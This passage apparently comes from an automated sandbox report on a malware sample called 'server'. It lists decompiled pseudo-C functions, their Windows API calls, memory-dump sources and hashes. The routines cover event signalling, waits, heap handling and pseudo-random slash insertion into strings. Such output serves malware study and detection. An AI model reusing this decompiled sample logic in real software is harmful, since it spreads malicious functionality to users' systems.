            				_t3 = _t8 + 0x7eb7b4; // 0x61636f4c
            				_t25 = 0;
            				_t30 = E007E74EC(_t3, 1);
            				if(_t30 != 0) {
            					_t25 = CreateEventA(0x7ea34c, 1, 0, _t30);
            					E007E61DA(_t30);
            				}
            				_t12 =  *0x7ea2fc; // 0x2000000a
            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E007E30D5() != 0) {
            					L12:
            					_t28 = _a8;
            					if(_t28 != 0) {
            						 *_t28 =  *_t28 | 0x00000001;
            					}
            					_t31 = E007E37DF(_t32, 0);
            					if(_t31 == 0 && _t25 != 0) {
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            					}
            					if(_t28 != 0 && _t31 != 0) {
            						 *_t28 =  *_t28 & 0xfffffffe;
            					}
            					goto L20;
            				} else {
            					_t19 =  *0x7ea124( *_t32, 0x20);
            					if(_t19 != 0) {
            						 *_t19 = 0;
            						_t19 = _t19 + 2;
            					}
            					_t31 = E007E23C4(0,  *_t32, _t19, 0);
            					if(_t31 == 0) {
            						if(_t25 == 0) {
            							L22:
            							return _t31;
            						}
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            						if(_t31 == 0) {
            							L20:
            							if(_t25 != 0) {
            								CloseHandle(_t25);
            							}
            							goto L22;
            						}
            					}
            					goto L12;
            				}
            			}

            APIs
              • Part of subcall function 007E74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,02F19E40,00000000,?,?,43175AC3,00000005,007EA00C,4D283A53,?,?), ref: 007E7522
              • Part of subcall function 007E74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 007E7546
              • Part of subcall function 007E74EC: lstrcat.KERNEL32(00000000,00000000), ref: 007E754E
            • CreateEventA.KERNEL32(007EA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,007E6A95,?,?,?), ref: 007E4A11
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • WaitForSingleObject.KERNEL32(00000000,00004E20,007E6A95,00000000,00000000,?,00000000,?,007E6A95,?,?,?), ref: 007E4A71
            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,007E6A95,?,?,?), ref: 007E4A9F
            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,007E6A95,?,?,?), ref: 007E4AB7
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
            • String ID:
            • API String ID: 73268831-0
            • Opcode ID: 3e8d341c8903bbc2f092ca77e9daf3eff2a6211b299dab0c1ea29ca4870c5682
            • Instruction ID: 04dee846db39f544529f6a6440599e88fb9c9c55c95308142236010b433ef51d
            • Opcode Fuzzy Hash: 3e8d341c8903bbc2f092ca77e9daf3eff2a6211b299dab0c1ea29ca4870c5682
            • Instruction Fuzzy Hash: 1021D5336832D1ABC7319B668C88A6B77A9FB8C724B058635FA419B151DB2CDC008758
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E007E69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
            				intOrPtr _v12;
            				void* _v16;
            				void* _v28;
            				char _v32;
            				void* __esi;
            				void* _t29;
            				void* _t38;
            				signed int* _t39;
            				void* _t40;
            
            				_t36 = __ecx;
            				_v32 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v12 = _a4;
            				_t38 = E007E2A3D(__ecx,  &_v32);
            				if(_t38 != 0) {
            					L12:
            					_t39 = _a8;
            					L13:
            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
            						_t23 =  &(_t39[1]);
            						if(_t39[1] != 0) {
            							E007E28B3(_t23);
            						}
            					}
            					return _t38;
            				}
            				if(E007E6ADC(0x40,  &_v16) != 0) {
            					_v16 = 0;
            				}
            				_t40 = CreateEventA(0x7ea34c, 1, 0,  *0x7ea3e4);
            				if(_t40 != 0) {
            					SetEvent(_t40);
            					Sleep(0xbb8);
            					CloseHandle(_t40);
            				}
            				_push( &_v32);
            				if(_a12 == 0) {
            					_t29 = E007E5704(_t36);
            				} else {
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_t29 = E007E4C94(_t36);
            				}
            				_t41 = _v16;
            				_t38 = _t29;
            				if(_v16 != 0) {
            					E007E7220(_t41);
            				}
            				if(_t38 != 0) {
            					goto L12;
            				} else {
            					_t39 = _a8;
            					_t38 = E007E49D0( &_v32, _t39);
            					goto L13;
            				}
            			}

            APIs
            • CreateEventA.KERNEL32(007EA34C,00000001,00000000,00000040,?,?,74D0F710,00000000,74D0F730), ref: 007E6A37
            • SetEvent.KERNEL32(00000000), ref: 007E6A44
            • Sleep.KERNEL32(00000BB8), ref: 007E6A4F
            • CloseHandle.KERNEL32(00000000), ref: 007E6A56
              • Part of subcall function 007E5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vj~,?,?,?,?,?,007E6A76,?), ref: 007E57DE
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
            • String ID:
            • API String ID: 2559942907-0
            • Opcode ID: 1a1fd677edc58eec955eaf1d3993d56ae221aa6c08d04917edf056d461287d89
            • Instruction ID: 8dc8ac0fbf8ed74809347083b524f9d48ca475b647df918ea8963d70540d00fd
            • Opcode Fuzzy Hash: 1a1fd677edc58eec955eaf1d3993d56ae221aa6c08d04917edf056d461287d89
            • Instruction Fuzzy Hash: 8A214173D02199EBCB20AFE698898DE77A9AB1C350B05C439EA11B7101D63DA94587A0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E007E4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
            				intOrPtr _v8;
            				void* _v12;
            				void* _v16;
            				intOrPtr _t26;
            				intOrPtr* _t28;
            				intOrPtr _t31;
            				intOrPtr* _t32;
            				void* _t39;
            				int _t46;
            				intOrPtr* _t47;
            				int _t48;
            
            				_t47 = __eax;
            				_push( &_v12);
            				_push(__eax);
            				_t39 = 0;
            				_t46 = 0;
            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
            				_v8 = _t26;
            				if(_t26 < 0) {
            					L13:
            					return _v8;
            				}
            				if(_v12 == 0) {
            					Sleep(0xc8);
            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
            				}
            				if(_v8 >= _t39) {
            					_t28 = _v12;
            					if(_t28 != 0) {
            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
            						_v8 = _t31;
            						if(_t31 >= 0) {
            							_t46 = lstrlenW(_v16);
            							if(_t46 != 0) {
            								_t46 = _t46 + 1;
            								_t48 = _t46 + _t46;
            								_t39 = E007E33DC(_t48);
            								if(_t39 == 0) {
            									_v8 = 0x8007000e;
            								} else {
            									memcpy(_t39, _v16, _t48);
            								}
            								__imp__#6(_v16);
            							}
            						}
            						_t32 = _v12;
            						 *((intOrPtr*)( *_t32 + 8))(_t32);
            					}
            					 *_a4 = _t39;
            					 *_a8 = _t46 + _t46;
            				}
            				goto L13;
            			}

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeSleepStringlstrlenmemcpy
            • String ID:
            • API String ID: 1198164300-0
            • Opcode ID: 5385ece81c3fb011ae4be39ca3e8805415acc33264b530415b1fec8b9dc3fb8d
            • Instruction ID: 66066028aaec121d81259319af27f6dc2298ff6ea5020ad78a5a2c4f4edb1e19
            • Opcode Fuzzy Hash: 5385ece81c3fb011ae4be39ca3e8805415acc33264b530415b1fec8b9dc3fb8d
            • Instruction Fuzzy Hash: 87214175A0224AEFCB11DFA5D988D9EBBB5FF4D314B108169E905D7310EB34DA11CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E007E2708(unsigned int __eax, void* __ecx) {
            				void* _v8;
            				void* _v12;
            				signed int _t21;
            				signed short _t23;
            				char* _t27;
            				void* _t29;
            				void* _t30;
            				unsigned int _t33;
            				void* _t37;
            				unsigned int _t38;
            				void* _t41;
            				void* _t42;
            				int _t45;
            				void* _t46;
            
            				_t42 = __eax;
            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
            				_t38 = __eax;
            				_t30 = RtlAllocateHeap( *0x7ea2d8, 0, (__eax >> 3) + __eax + 1);
            				_v12 = _t30;
            				if(_t30 != 0) {
            					_v8 = _t42;
            					do {
            						_t33 = 0x18;
            						if(_t38 <= _t33) {
            							_t33 = _t38;
            						}
            						_t21 =  *0x7ea2f0; // 0x7e8a86b2
            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
            						 *0x7ea2f0 = _t23;
            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
            						memcpy(_t30, _v8, _t45);
            						_v8 = _v8 + _t45;
            						_t27 = _t30 + _t45;
            						_t38 = _t38 - _t45;
            						_t46 = _t46 + 0xc;
            						 *_t27 = 0x2f;
            						_t13 = _t27 + 1; // 0x1
            						_t30 = _t13;
            					} while (_t38 > 8);
            					memcpy(_t30, _v8, _t38 + 1);
            				}
            				return _v12;
            			}

            • Instruction Addresses: 0x007e2710, 0x007e2713, 0x007e2719, 0x007e2731, 0x007e2733, 0x007e2738, 0x007e273a, 0x007e273d, 0x007e273f, 0x007e2742, 0x007e2744, 0x007e2744, 0x007e2746, 0x007e2751, 0x007e2756, 0x007e2767, 0x007e276f, 0x007e2774, 0x007e2777, 0x007e277a, 0x007e277c, 0x007e277f, 0x007e2782, 0x007e2782, 0x007e2785, 0x007e2790, 0x007e2795, 0x007e279f

            APIs
            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,007E6708,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E2713
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 007E272B
            • memcpy.NTDLL(00000000,02F19600,-00000008,?,?,?,007E6708,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E276F
            • memcpy.NTDLL(00000001,02F19600,00000001,007E3ECE,00000000,02F19600), ref: 007E2790
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: memcpy$AllocateHeaplstrlen
            • String ID:
            • API String ID: 1819133394-0
            • Opcode ID: d9a2e20f8a1eaaf1a1509b333654d0e02d3dddd46ee54cac0b716864f0ec77c7
            • Instruction ID: 0acea40364ae7481e4762a49f46398810d24521b0c076fe870850dc3de018710
            • Opcode Fuzzy Hash: d9a2e20f8a1eaaf1a1509b333654d0e02d3dddd46ee54cac0b716864f0ec77c7
            • Instruction Fuzzy Hash: 6B113A72A01249BFC3108B69CC84D9E7BBEEBC8360B154175F604DB151E7789E008390
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E007E23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				intOrPtr _v36;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				void _v60;
            				char _v64;
            				intOrPtr _t18;
            				intOrPtr _t19;
            				intOrPtr _t26;
            				intOrPtr _t27;
            				long _t28;
            
            				_t27 = __edi;
            				_t26 = _a8;
            				_t28 = E007E3A63(_a4, _t26, __edi);
            				if(_t28 != 0) {
            					memset( &_v60, 0, 0x38);
            					_t18 =  *0x7ea348; // 0x272d5a8
            					_t28 = 0;
            					_v64 = 0x3c;
            					if(_a12 == 0) {
            						_t7 = _t18 + 0x7eb50c; // 0x70006f
            						_t19 = _t7;
            					} else {
            						_t6 = _t18 + 0x7eb8d8; // 0x750072
            						_t19 = _t6;
            					}
            					_v52 = _t19;
            					_push(_t28);
            					_v48 = _a4;
            					_v44 = _t26;
            					_v36 = _t27;
            					E007E5B56();
            					_push( &_v64);
            					if( *0x7ea100() == 0) {
            						_t28 = GetLastError();
            					}
            					_push(1);
            					E007E5B56();
            				}
            				return _t28;
            			}

            • Instruction Addresses: 0x007e23c4, 0x007e23cb, 0x007e23d9, 0x007e23dd, 0x007e23e7, 0x007e23ec, 0x007e23f1, 0x007e23f6, 0x007e2400, 0x007e240a, 0x007e240a, 0x007e2402, 0x007e2402, 0x007e2402, 0x007e2402, 0x007e2410, 0x007e2416, 0x007e2417, 0x007e241a, 0x007e241d, 0x007e2420, 0x007e2428, 0x007e2431, 0x007e2439, 0x007e2439, 0x007e243b, 0x007e243d, 0x007e243d, 0x007e2447

            APIs
              • Part of subcall function 007E3A63: SysAllocString.OLEAUT32(00000000), ref: 007E3ABD
              • Part of subcall function 007E3A63: SysAllocString.OLEAUT32(0070006F), ref: 007E3AD1
              • Part of subcall function 007E3A63: SysAllocString.OLEAUT32(00000000), ref: 007E3AE3
            • memset.NTDLL ref: 007E23E7
            • GetLastError.KERNEL32 ref: 007E2433
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AllocString$ErrorLastmemset
            • String ID: <$E~~
            • API String ID: 3736384471-4260617627
            • Opcode ID: cee6cfa07df6a9d823c6f79cf304ff0488fc13f5d0eff09cef0de0f662418824
            • Instruction ID: bff1e2a9fd115e02780eda79b86156758b3f6c03bf2240a7c61050894be4149c
            • Opcode Fuzzy Hash: cee6cfa07df6a9d823c6f79cf304ff0488fc13f5d0eff09cef0de0f662418824
            • Instruction Fuzzy Hash: FA014471902298ABC711DFA5D885EDE7BBCBB0C744F408126F904E7251E7789D418B95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E7843(void* __esi) {
            				struct _SECURITY_ATTRIBUTES* _v4;
            				void* _t8;
            				void* _t10;
            
            				_v4 = 0;
            				memset(__esi, 0, 0x38);
            				_t8 = CreateEventA(0, 1, 0, 0);
            				 *(__esi + 0x1c) = _t8;
            				if(_t8 != 0) {
            					_t10 = CreateEventA(0, 1, 1, 0);
            					 *(__esi + 0x20) = _t10;
            					if(_t10 == 0) {
            						CloseHandle( *(__esi + 0x1c));
            					} else {
            						_v4 = 1;
            					}
            				}
            				return _v4;
            			}

            • Instruction Addresses: 0x007e784d, 0x007e7851, 0x007e7866, 0x007e7868, 0x007e786d, 0x007e7873, 0x007e7875, 0x007e787a, 0x007e7885, 0x007e787c, 0x007e787c, 0x007e787c, 0x007e787a, 0x007e7893

            APIs
            • memset.NTDLL ref: 007E7851
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,74CF81D0,00000000,00000000), ref: 007E7866
            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007E7873
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,007E3F34,00000000,?), ref: 007E7885
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CreateEvent$CloseHandlememset
            • String ID:
            • API String ID: 2812548120-0
            • Opcode ID: e8ba754321fa0d76379bb6702bd95a73184834f040af4f8b79eed377cbb55d8b
            • Instruction ID: 2019429e5f7a6aab41ce0db5ccf62249afe913604f2bf2f0d8613538a0c04ed3
            • Opcode Fuzzy Hash: e8ba754321fa0d76379bb6702bd95a73184834f040af4f8b79eed377cbb55d8b
            • Instruction Fuzzy Hash: 07F089B110534C7FD3145F26DCC4C27BB9CEB992987114D3EF14295511C679AC05CA60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00781C63), ref: 00781FDE
            • GetVersion.KERNEL32(?,00781C63), ref: 00781FED
            • GetCurrentProcessId.KERNEL32(?,00781C63), ref: 00782009
            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00781C63), ref: 00782022
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: 65ba2c1b2af24db351cab05015b2526afc50c83ea666487d2bddc43ce56fae15
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 08F08CB05853009BE750AF78BE0DB553F64B795753F000036E641FA1E4D7748982CB5C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E3230() {
            				void* _t1;
            				intOrPtr _t5;
            				void* _t6;
            				void* _t7;
            				void* _t11;
            
            				_t1 =  *0x7ea30c; // 0x248
            				if(_t1 == 0) {
            					L8:
            					return 0;
            				}
            				SetEvent(_t1);
            				_t11 = 0x7fffffff;
            				while(1) {
            					SleepEx(0x64, 1);
            					_t5 =  *0x7ea35c; // 0x0
            					if(_t5 == 0) {
            						break;
            					}
            					_t11 = _t11 - 0x64;
            					if(_t11 > 0) {
            						continue;
            					}
            					break;
            				}
            				_t6 =  *0x7ea30c; // 0x248
            				if(_t6 != 0) {
            					CloseHandle(_t6);
            				}
            				_t7 =  *0x7ea2d8; // 0x2b20000
            				if(_t7 != 0) {
            					HeapDestroy(_t7);
            				}
            				goto L8;
            			}

            • Instruction Addresses: 0x007e3230, 0x007e3237, 0x007e3281, 0x007e3283, 0x007e3283, 0x007e323b, 0x007e3241, 0x007e3246, 0x007e324a, 0x007e3250, 0x007e3257, 0x00000000, 0x00000000, 0x007e3259, 0x007e325e, 0x00000000, 0x00000000, 0x00000000, 0x007e325e, 0x007e3260, 0x007e3268, 0x007e326b, 0x007e326b, 0x007e3271, 0x007e3278, 0x007e327b, 0x007e327b, 0x00000000

            APIs
            • SetEvent.KERNEL32(00000248,00000001,007E109A), ref: 007E323B
            • SleepEx.KERNEL32(00000064,00000001), ref: 007E324A
            • CloseHandle.KERNEL32(00000248), ref: 007E326B
            • HeapDestroy.KERNEL32(02B20000), ref: 007E327B
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CloseDestroyEventHandleHeapSleep
            • String ID:
            • API String ID: 4109453060-0
            • Opcode ID: ad54a20e490997a4fe1dbf412f33eb566b9d588fe008c6b4bdd6c708fd547d0d
            • Instruction ID: e01d00c176da7efa3c15dd812527ebac64732ddcc55180ab39c1957e1d3b63fa
            • Opcode Fuzzy Hash: ad54a20e490997a4fe1dbf412f33eb566b9d588fe008c6b4bdd6c708fd547d0d
            • Instruction Fuzzy Hash: 42F01C76A032D2A7DB109B769DCCA823BECBB0C761B048110BE00EF2E1DB2CE9409564
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E007E607C() {
            				void* _v0;
            				void** _t3;
            				void** _t5;
            				void** _t7;
            				void** _t8;
            				void* _t10;
            
            				_t3 =  *0x7ea3cc; // 0x2f19600
            				__imp__( &(_t3[0x10]));
            				while(1) {
            					_t5 =  *0x7ea3cc; // 0x2f19600
            					_t1 =  &(_t5[0x16]); // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t7 =  *0x7ea3cc; // 0x2f19600
            				_t10 =  *_t7;
            				if(_t10 != 0 && _t10 != 0x7eb142) {
            					HeapFree( *0x7ea2d8, 0, _t10);
            					_t7 =  *0x7ea3cc; // 0x2f19600
            				}
            				 *_t7 = _v0;
            				_t8 =  &(_t7[0x10]);
            				__imp__(_t8);
            				return _t8;
            			}

            • Instruction Addresses: 0x007e607c, 0x007e6085, 0x007e6095, 0x007e6095, 0x007e609a, 0x007e609f, 0x00000000, 0x00000000, 0x007e608f, 0x007e608f, 0x007e60a1, 0x007e60a6, 0x007e60aa, 0x007e60bd, 0x007e60c3, 0x007e60c3, 0x007e60cc, 0x007e60ce, 0x007e60d2, 0x007e60d8

            APIs
            • RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E6085
            • Sleep.KERNEL32(0000000A), ref: 007E608F
            • HeapFree.KERNEL32(00000000), ref: 007E60BD
            • RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E60D2
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID:
            • API String ID: 58946197-0
            • Opcode ID: ec8eda5081d7d54a434c31e46d8d3ea68cdca125fd5f0ccb8929f33a7a3788ba
            • Instruction ID: 6070a7e3727724372c658cf116b8cb0e64d29e309436fd728e00738250ce7cb5
            • Opcode Fuzzy Hash: ec8eda5081d7d54a434c31e46d8d3ea68cdca125fd5f0ccb8929f33a7a3788ba
            • Instruction Fuzzy Hash: 17F0DA75202282ABE714CF56DCC9E157BB5EB5C751B08C014EA02DF3B0D73CAC44DA2A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: __aulldvrm
            • String ID:
            • API String ID: 1302938615-3916222277
            • Opcode ID: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
            • Instruction ID: 0b4e2962642302af5baa7ab99a723a4d0387960a43f5b709c9065034346dd514
            • Opcode Fuzzy Hash: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
            • Instruction Fuzzy Hash: 09919F35900229DADB319A64CD883EAB3B4AF54314F1402FED819776D2D7B95ECACF48
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E007E2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
            				intOrPtr* _v8;
            				void* _t17;
            				intOrPtr* _t22;
            				void* _t27;
            				char* _t30;
            				void* _t33;
            				void* _t34;
            				void* _t36;
            				void* _t37;
            				void* _t39;
            				int _t42;
            
            				_t17 = __eax;
            				_t37 = 0;
            				__imp__(_a4, _t33, _t36, _t27, __ecx);
            				_t2 = _t17 + 1; // 0x1
            				_t28 = _t2;
            				_t34 = E007E33DC(_t2);
            				if(_t34 != 0) {
            					_t30 = E007E33DC(_t28);
            					if(_t30 == 0) {
            						E007E61DA(_t34);
            					} else {
            						_t39 = _a4;
            						_t22 = E007E7AE9(_t39);
            						_v8 = _t22;
            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
            							_a4 = _t39;
            						} else {
            							_t26 = _t22 + 2;
            							_a4 = _t22 + 2;
            							_t22 = E007E7AE9(_t26);
            							_v8 = _t22;
            						}
            						if(_t22 == 0) {
            							__imp__(_t34, _a4);
            							 *_t30 = 0x2f;
            							 *((char*)(_t30 + 1)) = 0;
            						} else {
            							_t42 = _t22 - _a4;
            							memcpy(_t34, _a4, _t42);
            							 *((char*)(_t34 + _t42)) = 0;
            							__imp__(_t30, _v8);
            						}
            						 *_a8 = _t34;
            						_t37 = 1;
            						 *_a12 = _t30;
            					}
            				}
            				return _t37;
            			}

            • Instruction Addresses: 0x007e2058, 0x007e2062, 0x007e2064, 0x007e206a, 0x007e206a, 0x007e2073, 0x007e2077, 0x007e2083, 0x007e2087, 0x007e20fb, 0x007e2089, 0x007e2089, 0x007e208d, 0x007e2092, 0x007e2097, 0x007e20b1, 0x007e20a0, 0x007e20a0, 0x007e20a4, 0x007e20a7, 0x007e20ac, 0x007e20ac, 0x007e20b6, 0x007e20de, 0x007e20e4, 0x007e20e7, 0x007e20b8, 0x007e20ba, 0x007e20c2, 0x007e20cd, 0x007e20d2, 0x007e20d2, 0x007e20ee, 0x007e20f5, 0x007e20f6, 0x007e20f6, 0x007e2087, 0x007e2106

            APIs
            • lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?,?,74CF81D0), ref: 007E2064
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
              • Part of subcall function 007E7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,007E2092,00000000,00000001,00000001,?,?,007E51F7,?,?,?,?,00000102), ref: 007E7AF7
              • Part of subcall function 007E7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?,?,74CF81D0,00000000), ref: 007E7B01
            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?), ref: 007E20C2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 007E20D2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 007E20DE
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
